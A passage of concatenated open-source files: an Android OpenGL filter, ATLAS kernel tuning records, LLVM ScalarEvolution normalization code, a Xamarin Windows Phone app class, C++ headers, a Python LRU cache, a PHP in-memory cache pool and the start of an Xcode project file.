\tinputTextureHandles[i] = -1;\n }\n\t\n\tprotected void onDrawArraysAfter(){\n\t\tfor(int i = 0; i < inputTextureHandles.length\n\t\t\t\t&& inputTextureHandles[i] != OpenGlUtils.NO_TEXTURE; i++){\n\t\t\tGLES20.glActiveTexture(GLES20.GL_TEXTURE0 + (i+3));\n\t\t\tGLES20.glBindTexture(GLES20.GL_TEXTURE_2D, 0);\n\t\t\tGLES20.glActiveTexture(GLES20.GL_TEXTURE0);\n\t\t}\n\t}\n\t \n\tprotected void onDrawArraysPre(){\n\t\tfor(int i = 0; i < inputTextureHandles.length \n\t\t\t\t&& inputTextureHandles[i] != OpenGlUtils.NO_TEXTURE; i++){\n\t\t\tGLES20.glActiveTexture(GLES20.GL_TEXTURE0 + (i+3) );\n\t\t\tGLES20.glBindTexture(GLES20.GL_TEXTURE_2D, inputTextureHandles[i]);\n\t\t\tGLES20.glUniform1i(inputTextureUniformLocations[i], (i+3));\n\t\t}\n\t}\n\t\n\tprotected void onInit(){\n\t\tsuper.onInit();\n\t\tfor(int i=0; i < inputTextureUniformLocations.length; i++)\n\t\t\tinputTextureUniformLocations[i] = GLES20.glGetUniformLocation(getProgram(), \"inputImageTexture\"+(2+i));\n\t\tmGLStrengthLocation = GLES20.glGetUniformLocation(mGLProgId,\n\t\t\t\t\"strength\");\n\t}\n\t\n\tprotected void onInitialized(){\n\t\tsuper.onInitialized();\n\t\tsetFloat(mGLStrengthLocation, 1.0f);\n\t runOnDraw(new Runnable(){\n\t\t public void run(){\n\t\t \tinputTextureHandles[0] = OpenGlUtils.loadTexture(MyApplication.getContext(), \"filter/inkwellmap.png\");\n\t\t }\n\t });\n\t}\n}\n"} {"text": "ID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=24 NB=4 KB=24 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-1.031111e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=48 NB=4 KB=48 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-1.941996e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=72 NB=4 KB=72 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-2.659937e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=96 NB=4 KB=96 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.140357e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=120 NB=4 KB=120 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.513656e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=144 NB=4 KB=144 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.740889e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=168 NB=4 KB=168 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.960681e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=192 NB=4 KB=192 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.135516e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. 
Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=216 NB=4 KB=216 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.289915e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=240 NB=4 KB=240 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.416430e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=264 NB=4 KB=264 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.513734e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=288 NB=4 KB=288 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.599546e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=312 NB=4 KB=312 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.678302e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=336 NB=4 KB=336 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.722391e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=360 NB=4 KB=360 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.782746e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=384 NB=4 KB=384 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.841730e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=408 NB=4 KB=408 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.854265e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=432 NB=4 KB=432 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.886417e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=456 NB=4 KB=456 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.912444e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=480 NB=4 KB=480 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.944009e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\n"} {"text": "//===- ScalarEvolutionNormalization.cpp - See below -----------------------===//\n//\n// The LLVM Compiler Infrastructure\n//\n// This file is distributed under the University of Illinois Open Source\n// License. 
See LICENSE.TXT for details.\n//\n//===----------------------------------------------------------------------===//\n//\n// This file implements utilities for working with \"normalized\" expressions.\n// See the comments at the top of ScalarEvolutionNormalization.h for details.\n//\n//===----------------------------------------------------------------------===//\n\n#include \"llvm/IR/Dominators.h\"\n#include \"llvm/Analysis/LoopInfo.h\"\n#include \"llvm/Analysis/ScalarEvolutionExpressions.h\"\n#include \"llvm/Analysis/ScalarEvolutionNormalization.h\"\nusing namespace llvm;\n\n/// IVUseShouldUsePostIncValue - We have discovered a \"User\" of an IV expression\n/// and now we need to decide whether the user should use the preinc or post-inc\n/// value. If this user should use the post-inc version of the IV, return true.\n///\n/// Choosing wrong here can break dominance properties (if we choose to use the\n/// post-inc value when we cannot) or it can end up adding extra live-ranges to\n/// the loop, resulting in reg-reg copies (if we use the pre-inc value when we\n/// should use the post-inc value).\nstatic bool IVUseShouldUsePostIncValue(Instruction *User, Value *Operand,\n const Loop *L, DominatorTree *DT) {\n // If the user is in the loop, use the preinc value.\n if (L->contains(User)) return false;\n\n BasicBlock *LatchBlock = L->getLoopLatch();\n if (!LatchBlock)\n return false;\n\n // Ok, the user is outside of the loop. If it is dominated by the latch\n // block, use the post-inc value.\n if (DT->dominates(LatchBlock, User->getParent()))\n return true;\n\n // There is one case we have to be careful of: PHI nodes. These little guys\n // can live in blocks that are not dominated by the latch block, but (since\n // their uses occur in the predecessor block, not the block the PHI lives in)\n // should still use the post-inc value. Check for this case now.\n PHINode *PN = dyn_cast(User);\n if (!PN || !Operand) return false; // not a phi, not dominated by latch block.\n\n // Look at all of the uses of Operand by the PHI node. If any use corresponds\n // to a block that is not dominated by the latch block, give up and use the\n // preincremented value.\n for (unsigned i = 0, e = PN->getNumIncomingValues(); i != e; ++i)\n if (PN->getIncomingValue(i) == Operand &&\n !DT->dominates(LatchBlock, PN->getIncomingBlock(i)))\n return false;\n\n // Okay, all uses of Operand by PN are in predecessor blocks that really are\n // dominated by the latch block. 
Use the post-incremented value.\n return true;\n}\n\nnamespace {\n\n/// Hold the state used during post-inc expression transformation, including a\n/// map of transformed expressions.\nclass PostIncTransform {\n TransformKind Kind;\n PostIncLoopSet &Loops;\n ScalarEvolution &SE;\n DominatorTree &DT;\n\n DenseMap Transformed;\n\npublic:\n PostIncTransform(TransformKind kind, PostIncLoopSet &loops,\n ScalarEvolution &se, DominatorTree &dt):\n Kind(kind), Loops(loops), SE(se), DT(dt) {}\n\n const SCEV *TransformSubExpr(const SCEV *S, Instruction *User,\n Value *OperandValToReplace);\n\nprotected:\n const SCEV *TransformImpl(const SCEV *S, Instruction *User,\n Value *OperandValToReplace);\n};\n\n} // namespace\n\n/// Implement post-inc transformation for all valid expression types.\nconst SCEV *PostIncTransform::\nTransformImpl(const SCEV *S, Instruction *User, Value *OperandValToReplace) {\n\n if (const SCEVCastExpr *X = dyn_cast(S)) {\n const SCEV *O = X->getOperand();\n const SCEV *N = TransformSubExpr(O, User, OperandValToReplace);\n if (O != N)\n switch (S->getSCEVType()) {\n case scZeroExtend: return SE.getZeroExtendExpr(N, S->getType());\n case scSignExtend: return SE.getSignExtendExpr(N, S->getType());\n case scTruncate: return SE.getTruncateExpr(N, S->getType());\n default: llvm_unreachable(\"Unexpected SCEVCastExpr kind!\");\n }\n return S;\n }\n\n if (const SCEVAddRecExpr *AR = dyn_cast(S)) {\n // An addrec. This is the interesting part.\n SmallVector Operands;\n const Loop *L = AR->getLoop();\n // The addrec conceptually uses its operands at loop entry.\n Instruction *LUser = &L->getHeader()->front();\n // Transform each operand.\n for (SCEVNAryExpr::op_iterator I = AR->op_begin(), E = AR->op_end();\n I != E; ++I) {\n Operands.push_back(TransformSubExpr(*I, LUser, nullptr));\n }\n // Conservatively use AnyWrap until/unless we need FlagNW.\n const SCEV *Result = SE.getAddRecExpr(Operands, L, SCEV::FlagAnyWrap);\n switch (Kind) {\n case NormalizeAutodetect:\n // Normalize this SCEV by subtracting the expression for the final step.\n // We only allow affine AddRecs to be normalized, otherwise we would not\n // be able to correctly denormalize.\n // e.g. {1,+,3,+,2} == {-2,+,1,+,2} + {3,+,2}\n // Normalized form: {-2,+,1,+,2}\n // Denormalized form: {1,+,3,+,2}\n //\n // However, denormalization would use a different step expression than\n // normalization (see getPostIncExpr), generating the wrong final\n // expression: {-2,+,1,+,2} + {1,+,2} => {-1,+,3,+,2}\n if (AR->isAffine() &&\n IVUseShouldUsePostIncValue(User, OperandValToReplace, L, &DT)) {\n const SCEV *TransformedStep =\n TransformSubExpr(AR->getStepRecurrence(SE),\n User, OperandValToReplace);\n Result = SE.getMinusSCEV(Result, TransformedStep);\n Loops.insert(L);\n }\n#if 0\n // This assert is conceptually correct, but ScalarEvolution currently\n // sometimes fails to canonicalize two equal SCEVs to exactly the same\n // form. 
It's possibly a pessimization when this happens, but it isn't a\n // correctness problem, so disable this assert for now.\n assert(S == TransformSubExpr(Result, User, OperandValToReplace) &&\n \"SCEV normalization is not invertible!\");\n#endif\n break;\n case Normalize:\n // We want to normalize step expression, because otherwise we might not be\n // able to denormalize to the original expression.\n //\n // Here is an example what will happen if we don't normalize step:\n // ORIGINAL ISE:\n // {(100 /u {1,+,1}<%bb16>),+,(100 /u {1,+,1}<%bb16>)}<%bb25>\n // NORMALIZED ISE:\n // {((-1 * (100 /u {1,+,1}<%bb16>)) + (100 /u {0,+,1}<%bb16>)),+,\n // (100 /u {0,+,1}<%bb16>)}<%bb25>\n // DENORMALIZED BACK ISE:\n // {((2 * (100 /u {1,+,1}<%bb16>)) + (-1 * (100 /u {2,+,1}<%bb16>))),+,\n // (100 /u {1,+,1}<%bb16>)}<%bb25>\n // Note that the initial value changes after normalization +\n // denormalization, which isn't correct.\n if (Loops.count(L)) {\n const SCEV *TransformedStep =\n TransformSubExpr(AR->getStepRecurrence(SE),\n User, OperandValToReplace);\n Result = SE.getMinusSCEV(Result, TransformedStep);\n }\n#if 0\n // See the comment on the assert above.\n assert(S == TransformSubExpr(Result, User, OperandValToReplace) &&\n \"SCEV normalization is not invertible!\");\n#endif\n break;\n case Denormalize:\n // Here we want to normalize step expressions for the same reasons, as\n // stated above.\n if (Loops.count(L)) {\n const SCEV *TransformedStep =\n TransformSubExpr(AR->getStepRecurrence(SE),\n User, OperandValToReplace);\n Result = SE.getAddExpr(Result, TransformedStep);\n }\n break;\n }\n return Result;\n }\n\n if (const SCEVNAryExpr *X = dyn_cast(S)) {\n SmallVector Operands;\n bool Changed = false;\n // Transform each operand.\n for (SCEVNAryExpr::op_iterator I = X->op_begin(), E = X->op_end();\n I != E; ++I) {\n const SCEV *O = *I;\n const SCEV *N = TransformSubExpr(O, User, OperandValToReplace);\n Changed |= N != O;\n Operands.push_back(N);\n }\n // If any operand actually changed, return a transformed result.\n if (Changed)\n switch (S->getSCEVType()) {\n case scAddExpr: return SE.getAddExpr(Operands);\n case scMulExpr: return SE.getMulExpr(Operands);\n case scSMaxExpr: return SE.getSMaxExpr(Operands);\n case scUMaxExpr: return SE.getUMaxExpr(Operands);\n default: llvm_unreachable(\"Unexpected SCEVNAryExpr kind!\");\n }\n return S;\n }\n\n if (const SCEVUDivExpr *X = dyn_cast(S)) {\n const SCEV *LO = X->getLHS();\n const SCEV *RO = X->getRHS();\n const SCEV *LN = TransformSubExpr(LO, User, OperandValToReplace);\n const SCEV *RN = TransformSubExpr(RO, User, OperandValToReplace);\n if (LO != LN || RO != RN)\n return SE.getUDivExpr(LN, RN);\n return S;\n }\n\n llvm_unreachable(\"Unexpected SCEV kind!\");\n}\n\n/// Manage recursive transformation across an expression DAG. 
Revisiting\n/// expressions would lead to exponential recursion.\nconst SCEV *PostIncTransform::\nTransformSubExpr(const SCEV *S, Instruction *User, Value *OperandValToReplace) {\n\n if (isa(S) || isa(S))\n return S;\n\n const SCEV *Result = Transformed.lookup(S);\n if (Result)\n return Result;\n\n Result = TransformImpl(S, User, OperandValToReplace);\n Transformed[S] = Result;\n return Result;\n}\n\n/// Top level driver for transforming an expression DAG into its requested\n/// post-inc form (either \"Normalized\" or \"Denormalized\").\nconst SCEV *llvm::TransformForPostIncUse(TransformKind Kind,\n const SCEV *S,\n Instruction *User,\n Value *OperandValToReplace,\n PostIncLoopSet &Loops,\n ScalarEvolution &SE,\n DominatorTree &DT) {\n PostIncTransform Transform(Kind, Loops, SE, DT);\n return Transform.TransformSubExpr(S, User, OperandValToReplace);\n}\n"} {"text": "using System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Linq;\nusing System.Runtime.InteropServices.WindowsRuntime;\nusing Windows.ApplicationModel;\nusing Windows.ApplicationModel.Activation;\nusing Windows.Foundation;\nusing Windows.Foundation.Collections;\nusing Windows.UI.Xaml;\nusing Windows.UI.Xaml.Controls;\nusing Windows.UI.Xaml.Controls.Primitives;\nusing Windows.UI.Xaml.Data;\nusing Windows.UI.Xaml.Input;\nusing Windows.UI.Xaml.Media;\nusing Windows.UI.Xaml.Media.Animation;\nusing Windows.UI.Xaml.Navigation;\n\n// The Blank Application template is documented at http://go.microsoft.com/fwlink/?LinkId=391641\n\nnamespace TraditionalCheckBox.WinPhone81\n{\n /// \n /// Provides application-specific behavior to supplement the default Application class.\n /// \n public sealed partial class App : Application\n {\n private TransitionCollection transitions;\n\n /// \n /// Initializes the singleton application object. This is the first line of authored code\n /// executed, and as such is the logical equivalent of main() or WinMain().\n /// \n public App()\n {\n this.InitializeComponent();\n this.Suspending += this.OnSuspending;\n }\n\n /// \n /// Invoked when the application is launched normally by the end user. 
Other entry points\n /// will be used when the application is launched to open a specific file, to display\n /// search results, and so forth.\n /// \n /// Details about the launch request and process.\n protected override void OnLaunched(LaunchActivatedEventArgs e)\n {\n#if DEBUG\n if (System.Diagnostics.Debugger.IsAttached)\n {\n this.DebugSettings.EnableFrameRateCounter = true;\n }\n#endif\n\n Frame rootFrame = Window.Current.Content as Frame;\n\n // Do not repeat app initialization when the Window already has content,\n // just ensure that the window is active\n if (rootFrame == null)\n {\n // Create a Frame to act as the navigation context and navigate to the first page\n rootFrame = new Frame();\n\n // TODO: change this value to a cache size that is appropriate for your application\n rootFrame.CacheSize = 1;\n\n // Set the default language\n rootFrame.Language = Windows.Globalization.ApplicationLanguages.Languages[0];\n\n Xamarin.Forms.Forms.Init(e);\n\n if (e.PreviousExecutionState == ApplicationExecutionState.Terminated)\n {\n // TODO: Load state from previously suspended application\n }\n\n // Place the frame in the current Window\n Window.Current.Content = rootFrame;\n }\n\n if (rootFrame.Content == null)\n {\n // Removes the turnstile navigation for startup.\n if (rootFrame.ContentTransitions != null)\n {\n this.transitions = new TransitionCollection();\n foreach (var c in rootFrame.ContentTransitions)\n {\n this.transitions.Add(c);\n }\n }\n\n rootFrame.ContentTransitions = null;\n rootFrame.Navigated += this.RootFrame_FirstNavigated;\n\n // When the navigation stack isn't restored navigate to the first page,\n // configuring the new page by passing required information as a navigation\n // parameter\n if (!rootFrame.Navigate(typeof(MainPage), e.Arguments))\n {\n throw new Exception(\"Failed to create initial page\");\n }\n }\n\n // Ensure the current window is active\n Window.Current.Activate();\n }\n\n /// \n /// Restores the content transitions after the app has launched.\n /// \n /// The object where the handler is attached.\n /// Details about the navigation event.\n private void RootFrame_FirstNavigated(object sender, NavigationEventArgs e)\n {\n var rootFrame = sender as Frame;\n rootFrame.ContentTransitions = this.transitions ?? new TransitionCollection() { new NavigationThemeTransition() };\n rootFrame.Navigated -= this.RootFrame_FirstNavigated;\n }\n\n /// \n /// Invoked when application execution is being suspended. Application state is saved\n /// without knowing whether the application will be terminated or resumed with the contents\n /// of memory still intact.\n /// \n /// The source of the suspend request.\n /// Details about the suspend request.\n private void OnSuspending(object sender, SuspendingEventArgs e)\n {\n var deferral = e.SuspendingOperation.GetDeferral();\n\n // TODO: Save application state and stop any background activity\n deferral.Complete();\n }\n }\n}"} {"text": "#pragma once\r\n\r\n// Keyboard keys acting like gamepad buttons\r\n#ifndef HAS_KBCTRL\r\n#define HAS_KBCTRL 0\r\n#endif\r\n\r\n#if HAS_KBCTRL == 1\r\n#include \r\n#include \"controls/controller_buttons.h\"\r\n\r\nnamespace dvl {\r\n\r\nControllerButton KbCtrlToControllerButton(const SDL_Event &event);\r\n\r\nbool IsKbCtrlButtonPressed(ControllerButton button);\r\n\r\nbool ProcessKbCtrlAxisMotion(const SDL_Event &event);\r\n\r\n} // namespace dvl\r\n#endif\r\n"} {"text": "# Copyright (C) 2011 Google Inc. 
All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nclass Node():\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.prev = None\n self.next = None\n\n\nclass LRUCache():\n \"\"\"An implementation of Least Recently Used (LRU) Cache.\"\"\"\n\n def __init__(self, capacity):\n \"\"\"Initializes a lru cache with the given capacity.\n\n Args:\n capacity: The capacity of the cache.\n \"\"\"\n assert capacity > 0, \"capacity (%s) must be greater than zero.\" % capacity\n self._first = None\n self._last = None\n self._dict = {}\n self._capacity = capacity\n\n def __setitem__(self, key, value):\n if key in self._dict:\n self.__delitem__(key)\n if not self._first:\n self._one_node(key, value)\n return\n if len(self._dict) >= self._capacity:\n del self._dict[self._last.key]\n if self._capacity == 1:\n self._one_node(key, value)\n return\n self._last = self._last.next\n self._last.prev = None\n node = Node(key, value)\n node.prev = self._first\n self._first.next = node\n self._first = node\n self._dict[key] = node\n\n def _one_node(self, key, value):\n node = Node(key, value)\n self._dict[key] = node\n self._first = node\n self._last = node\n\n def __getitem__(self, key):\n if not self._first:\n raise KeyError(str(key))\n if self._first.key == key:\n return self._first.value\n\n if self._last.key == key:\n next_last = self._last.next\n next_last.prev = None\n next_first = self._last\n next_first.prev = self._first\n next_first.next = None\n self._first.next = next_first\n self._first = next_first\n self._last = next_last\n return self._first.value\n\n node = self._dict[key]\n node.next.prev = node.prev\n node.prev.next = node.next\n node.prev = self._first\n node.next = None\n self._first.next = node\n self._first = node\n return self._first.value\n\n def __delitem__(self, key):\n node = self._dict[key]\n del self._dict[key]\n if self._first is self._last:\n self._last = None\n self._first = None\n return\n if self._first is node:\n self._first = node.prev\n self._first.next = None\n return\n if self._last is node:\n self._last = node.next\n self._last.prev = None\n return\n node.next.prev = node.prev\n node.prev.next = node.next\n\n def __len__(self):\n return len(self._dict)\n\n def __contains__(self, key):\n return key in 
self._dict\n\n def __iter__(self):\n return iter(self._dict)\n\n def items(self):\n return [(key, node.value) for key, node in self._dict.items()]\n\n def values(self):\n return [node.value for node in self._dict.values()]\n\n def keys(self):\n return self._dict.keys()\n"} {"text": "/*\n * Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.\n *\n * Use of this source code is governed by a BSD-style license\n * that can be found in the LICENSE file in the root of the source\n * tree. An additional intellectual property rights grant can be found\n * in the file PATENTS. All contributing project authors may\n * be found in the AUTHORS file in the root of the source tree.\n */\n\n#ifndef MODULES_DESKTOP_CAPTURE_WIN_DXGI_CONTEXT_H_\n#define MODULES_DESKTOP_CAPTURE_WIN_DXGI_CONTEXT_H_\n\n#include \n#include \"modules/desktop_capture/desktop_region.h\"\n\nnamespace webrtc {\n\n// A DxgiOutputContext stores the status of a single DxgiFrame of\n// DxgiOutputDuplicator.\nstruct DxgiOutputContext final {\n // The updated region DxgiOutputDuplicator::DetectUpdatedRegion() output\n // during last Duplicate() function call. It's always relative to the (0, 0).\n DesktopRegion updated_region;\n};\n\n// A DxgiAdapterContext stores the status of a single DxgiFrame of\n// DxgiAdapterDuplicator.\nstruct DxgiAdapterContext final {\n DxgiAdapterContext();\n DxgiAdapterContext(const DxgiAdapterContext& other);\n ~DxgiAdapterContext();\n\n // Child DxgiOutputContext belongs to this AdapterContext.\n std::vector contexts;\n};\n\n// A DxgiFrameContext stores the status of a single DxgiFrame of\n// DxgiDuplicatorController.\nstruct DxgiFrameContext final {\n public:\n DxgiFrameContext();\n // Unregister this Context instance from DxgiDuplicatorController during\n // destructing.\n ~DxgiFrameContext();\n\n // Reset current Context, so it will be reinitialized next time.\n void Reset();\n\n // A Context will have an exactly same |controller_id| as\n // DxgiDuplicatorController, to ensure it has been correctly setted up after\n // each DxgiDuplicatorController::Initialize().\n int controller_id = 0;\n\n // Child DxgiAdapterContext belongs to this DxgiFrameContext.\n std::vector contexts;\n};\n\n} // namespace webrtc\n\n#endif // MODULES_DESKTOP_CAPTURE_WIN_DXGI_CONTEXT_H_\n"} {"text": "getItems([$key]));\n }\n\n /**\n * {@inheritdoc}\n */\n public function getItems(array $keys = [])\n {\n $items = [];\n\n foreach ($keys as $key) {\n $items[$key] = $this->hasItem($key) ? 
clone $this->items[$key] : new Item($key);\n }\n\n return $items;\n }\n\n /**\n * {@inheritdoc}\n */\n public function hasItem($key)\n {\n $this->isValidKey($key);\n\n return isset($this->items[$key]) && $this->items[$key]->isHit();\n }\n\n /**\n * {@inheritdoc}\n */\n public function clear()\n {\n $this->items = [];\n $this->deferredItems = [];\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function deleteItem($key)\n {\n return $this->deleteItems([$key]);\n }\n\n /**\n * {@inheritdoc}\n */\n public function deleteItems(array $keys)\n {\n array_walk($keys, [$this, 'isValidKey']);\n\n foreach ($keys as $key) {\n unset($this->items[$key]);\n }\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function save(CacheItemInterface $item)\n {\n $this->items[$item->getKey()] = $item;\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function saveDeferred(CacheItemInterface $item)\n {\n $this->deferredItems[$item->getKey()] = $item;\n\n return true;\n }\n\n /**\n * {@inheritdoc}\n */\n public function commit()\n {\n foreach ($this->deferredItems as $item) {\n $this->save($item);\n }\n\n $this->deferredItems = [];\n\n return true;\n }\n\n /**\n * Determines if the provided key is valid.\n *\n * @param string $key\n * @return bool\n * @throws InvalidArgumentException\n */\n private function isValidKey($key)\n {\n $invalidCharacters = '{}()/\\\\\\\\@:';\n\n if (!is_string($key) || preg_match(\"#[$invalidCharacters]#\", $key)) {\n throw new InvalidArgumentException('The provided key is not valid: ' . var_export($key, true));\n }\n\n return true;\n }\n}\n"} {"text": "// !$*UTF8*$!\n{\n\t089C1669FE841209C02AAC07 /* Project object */ = {\n\t\tactiveBuildConfigurationName = Release;\n\t\tactiveTarget = 8D01CCC60486CAD60068D4B7 /* TPDFDither */;\n\t\tcodeSenseManager = 8BD3CCB9148830B20062E48C /* Code sense */;\n\t\tperUserDictionary = 